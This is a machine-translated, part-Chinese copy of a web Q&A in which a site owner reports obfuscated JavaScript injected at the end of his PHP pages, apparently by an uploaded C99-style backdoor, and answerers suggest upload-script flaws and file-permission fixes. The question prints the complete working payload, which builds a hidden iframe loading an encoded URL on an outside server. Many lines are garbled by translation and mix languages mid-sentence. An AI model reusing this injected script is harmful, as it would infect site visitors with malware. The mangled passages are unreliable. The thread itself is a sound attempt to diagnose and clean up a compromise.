代码之家 › 专栏 › 技术社区 › caw

php脚本:结尾恶意的javascript代码

virus security javascript php

caw · 技术社区 · 14 年前

问题:

在我的Web空间中有PHP文件,所有这些文件都以以下内容结尾:

<?php include 'footer.php'; ?>

在这行之前,文件中还有HTML代码。

当然,浏览器中的输出以这个结尾:

</body>
</html>

但昨天,有一些恶意代码突然结束了。my index.php的输出是:

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

I opened the file on my webspace (downloaded via FTP) and I saw that someone had put this code right into the file!

怎么会这样?

我能想象的唯一方法是:

Somebody got my FTP password. But he wouldn't only have put it into one file. He could have done much more damage. So I can't imagine this is the case.
I have a virus on my PC myself. I use Notepad++ for editing and FileZilla for uploading. Maybe these programs were contaminated as well and I uploaded the malicious code - without knowing.
Someone used a security hole (XSS) to put that code into the page. But he couldn't have put it right into the file, could he?

症状:

Users reported a blue panel popping up in Firefox. It asked them to install a plugin. 现在他们中的一些人在他们的PC上开发了.java.cVE-2010086. A。

这是因为恶意代码吗?代码到底做了什么?

你能帮助我吗?

请帮帮我,我真的很绝望。

也许还有一个问题,如果你知道我是怎么做到的:我以后怎么能阻止这样的事情发生呢?

编辑第1页:

我在Web空间的根目录中找到了一个名为“x76x09.php”的文件。它的文件大小为44.281字节。我已下载并尝试打开它。但我的防病毒软件说它是一个特洛伊木马(trojan.script.224490)。我认为这个文件已经被执行,并将恶意代码添加到每个目录的“index.php”中。这有帮助吗?特洛伊木马怎么会出现在我的网络空间?这是一种众所周知的病毒吗?

编辑第2页:

My hoster says he can now be sure that the file wasn't uploaded via FTP. So the infection didn't happen via FTP. According to my hoster, it must be insecure scripts.

编辑第3页:

根据phpsecinfo,安全孔:

允许\u url \u fopen=1
允许\url \include=1
ExpEffyPHP=1
file_uploads=1(这是恶意“x76x09.php”文件的原因吗?)
群组ID=99
用户标识=99

编辑第4页:

我分析了在我的Web服务器上执行的文件。 Here's the results .

因此,这种病毒似乎被称为:

PHP/C99 SHILL.BF
后门/php.c99外壳
后门.generic_c.cqa
特洛伊木马.script.224490
开发利用
后门.php.c99shell.bf
特洛伊木马.script.224490

其中一些会导致我的网站空间上添加恶意代码的恶意文件吗?

10 回复 | 直到 7 年前

Daniel Trebbien 14 年前

我认为问题不在于你使用的是共享主机,因为我发现了另外六个主机( degmsb , Benvolio , joomla01 , DJ-Alien , valerione1979 和 Kars ) whose websites had the same script added. Also, it is doubtful that any of your files would be writable by others because files that are uploaded over FTP are subject to the file creation mode bits mask.

我的最佳猜测是,有人正在使用已知的漏洞或针对共同弱点的漏洞攻击网站,而此人正在用 Google hacking . degmsb's Wordpress website and Benvolio's Burning Board Lite website were likely cracked via known exploits (possibly known exploits of plugins to these software bases such as TinyMCE), and your website, since you wrote it yourself, was likely cracked via an exploit against a common website weakness.

考虑到您允许文件上传(您的一个PHP脚本接受并保存您的用户上传的文件),我会考虑 CWE-434: Unrestricted Upload of File with Dangerous Type . A CWE-434 exploit works like this: suppose you allow users to upload avatar images or pictures. The script to which uploaded images are POSTed might save the file to /images 使用用户提供的相同文件名。现在想象有人上传 x76x09.gif.php (或) x76x09.gif.asp , x76x09.gif.php4 等)。您的脚本将尽职尽责地将此上载保存到 /images/x76x09.gif.php 而破解者要让服务器运行这个脚本所需要做的就是浏览到 /图片/x76x09.gif.php . 即使文件名为 x76x09.php.gif ,某些Web服务器将执行该文件。

另一种可能是php收到的上传文件名, $_FILES['upload']['name'] ,这就是 filename 价值在 Content-Disposition 发送的头,被构造成 ..\modules\x.gif . 如果脚本将新上载的文件保存到 str_replace('\\', '/', '/images/' . basename($_FILES['upload']['name'])) 或 /images/../modules/x.gif 在非Windows主机上( http://codepad.org/t83dYZwa ,并且用户可以通过某种方式使您的一个PHP脚本 include 或 require 中的任何脚本 modules 目录(比如说) index.php?module=x.gif&action=blah 然后,cracker就可以执行任意的php。

编辑: 它 looks like x76x09.php is some sort of unrestricted directory browser and file uploader. If a user manages to get this uploaded to your server, then they can basically do anything that you can do with your FTP access. 删除它。

编辑2: 查找的副本 this PHP source (部分) gzuncompress(base64_decode("HJ3H...geFb//eeff/79z/8A")); ) 从所有的PHP脚本中删除它。

EdTe3: Googling parts of the PHP script, I have found several webpages where this source is listed verbatim, and all of these pages have something to do with file uploading functionality for the respective websites. It therefore seems very likely that the hacker of your website used a CWE-434 exploit.

Sarfraz 14 年前

您的服务器似乎已被破坏,您是否也在共享主机上?

PhpSecInfo

alt text http://phpsec.org/images/psi_ss2.png

Kerry Jones 14 年前

你和谁在一起?一些招待员有可能被利用的安全漏洞。

Are you using WordPress? There's also been an number of reported outbreaks. The best thing to do would be google it looking for people with similar problems, which will also lead to the cause, which will lead to the solutions.

KCL 14 年前

As others have suggested, the vulnerability is most likely in some script you are using, maybe something you've written yourself or then a well known application that has known vulnerabilities. This might be a vulnerability in an upload script, but I want to point out that it is also possible to "upload" files through SQL injection, see the following thread for more details

phsource 14 年前

We have experienced a problem similar to this a while ago with one of our major web properties. What your web host said was correct: it was likely due to not FTP access, but an insecure script that somehow allowed modification of arbitrary files. In our case, a vulnerability in an old phpMyAdmin allowed changes to some PHP scripts.

读取特权 to all scripts and HTML files. It turns out that Apache could also write to scripts in our case. 简单地

cd web_files_directory
chown -R some_not_web_server_user:some_not_web_server_group .
find . -type f | xargs chmod 644
find . -type d | xargs chmod 755

Jason 14 年前

I would suggest changing any FTP or SSH passwords to be very secure. If you use a hosting provider you should also notify them of the breach. If you do not have logs to investigate the matter then they may. You should also Google the code that was added to your page to see if you can find anything else.

CaseySoftware 14 年前

If you're on a shared server, other people have access to the server itself. This is sort of the definition of a shared server. The problem is that if you have files with permissions of 777, they are world-user-group writable. Which means anyone with access to the box can write to them. See the problem?

它所需要的就是一 person on that box to have a weak password, poorly configured script, or a horrible bit of code, and a mediocre script kiddie can cause all kinds of problems all over the box. Most of these attacks are purely automated. They get access, scan for attack-able files, and append as needed.

Most likely, you should change all of your files to 755 or 644 permissions. You'll sleep better at night.

Peter 14 年前

最 of the access points are which could be exploited. Unfortunately, that may not be good enough (writing and maintaining secure web applications is harder than most people think).

如果你没有您自己编写应用程序,或者如果您使用的是其他人编写的大型、复杂的组件,或者如果您只是需要帮助来处理网站安全问题,那么有一些商业服务可以对您的网站进行爬行,并尝试找出它们的弱点,例如:

http://www.qualys.com/products/qg_suite/was/

显然,这些服务要花钱,但你通常可以得到“免费试用”,看看它们是否有用。祝你好运!

GOsha 14 年前

如果您有静态IP-您可以禁止非您的IP进行FTP访问

bpeterson76 14 年前

这在我身上发生过一段时间,以不同的方式。工作帐户通过phpbb通过代码漏洞被破坏。不知怎么的,他们甚至将自己添加到mysql db users表中。这导致我们完全删除程序并停止使用。

一个旧的joomla安装是一个漏洞,允许人们做你所说的我的个人网站。我忘了它甚至在外面,但它足以为他们打开大门,在几个不同的网站上安装恶意代码。我关闭了网站,更改了权限,更新了joomla,并删除了文件。

My current production server gets "sniffed" for phpMyAdmin more than 1000 times per hour during some peak hack attempts. The bad guys are working overtime!

底线是,要小心开源代码,如果你真的使用它,更新,更新,更新。